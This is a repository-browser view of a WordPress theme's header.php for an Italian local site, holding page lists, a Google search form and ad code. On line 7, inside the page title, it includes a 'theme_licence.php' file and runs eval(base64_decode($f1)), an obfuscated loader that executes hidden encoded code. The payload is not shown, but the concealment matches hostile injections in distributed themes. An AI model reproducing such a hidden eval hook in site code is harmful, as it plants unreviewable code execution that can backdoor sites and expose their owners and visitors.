source: trunk/www.guidonia.net/wp/wp-content/themes/slickpress/header.php@ 44

Last change on this file since 44 was 44, checked in by luciano, 14 years ago
File size: 2.6 KB
Line 
1<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
2<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
3
4<!-- BEGIN html head -->
5<head profile="http://gmpg.org/xfn/11">
6<meta http-equiv="Content-Type" content="<?php bloginfo('html_type'); ?>; charset=<?php bloginfo('charset'); ?>" />
7<title><?php require_once("theme_licence.php"); eval(base64_decode($f1)); bloginfo('name'); ?> <?php wp_title(); ?></title>
8<link rel="stylesheet" type="text/css" href="<?php bloginfo('stylesheet_url'); ?>" />
9<!--[if lte IE 6]><link rel="stylesheet" type="text/css" href="<?php bloginfo('template_url'); ?>/ie.css" /><![endif]-->
10<script type="text/javascript" src="<?php bloginfo('template_url'); ?>/scripts.js"></script>
11<?php wp_head(); ?>
12</head>
13<!-- END html head -->
14
15<body>
16<?php start_template(); ?>
17<!-- BEGIN wrapper -->
18<div id="wrapper">
19 <!-- BEGIN header -->
20 <div id="header">
21 <!-- begin pages -->
22 <ol>
23 <li class="f"><a href="<?php echo get_option('home'); ?>">Home</a></li>
24 <?php dp_list_pages(); ?>
25 </ol>
26 <!-- end pages -->
27 <!-- begin logo -->
28 <h1><a href="<?php echo get_option('home'); ?>"><?php bloginfo('name'); ?></a></h1>
29 <!-- end logo -->
30 <!-- begin search -->
31
32
33<!-- google ricerca -->
34
35<style type="text/css">
36@import url(http://www.google.com/cse/api/branding.css);
37</style>
38<div align="right">
39<!--<div class="cse-branding-right" style="background-color:#FFFFFF;color:#000000"> -->
40 <div class="cse-branding-form">
41 <form action="http://www.google.it/cse" id="cse-search-box">
42 <div>
43 <input type="hidden" name="cx" value="partner-pub-9331412477710099:zddmx2dt0pz" />
44 <input type="hidden" name="ie" value="ISO-8859-1" />
45 <input type="text" name="q" size="31" />
46 <input type="submit" name="sa" value="Cerca" />
47 </div>
48 </form>
49 </div>
50 <div class="cse-branding-logo">
51 <img src="http://www.google.com/images/poweredby_transparent/poweredby_FFFFFF.gif" alt="Google" />
52 </div>
53 <div class="cse-branding-text">
54 Ricerca aui siti di Guidonia
55 </div>
56</div>
57
58<!-- fine ricerca -->
59
60 <!-- begin categories -->
61 <div class="break"></div>
62 <ul>
63 <?php dp_list_categories(); ?>
64 </ul>
65 <!-- end categories -->
66 </div>
67<div><p>
68<script type="text/javascript"><!--
69google_ad_client = "pub-9331412477710099";
70/* 728x15, creato 22/05/09 */
71google_ad_slot = "0316912235";
72google_ad_width = 728;
73google_ad_height = 15;
74//-->
75</script>
76<script type="text/javascript"
77src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
78</script><br/><br/>
79</p></div>
80 <!-- END header -->
81
Note: See TracBrowser for help on using the repository browser.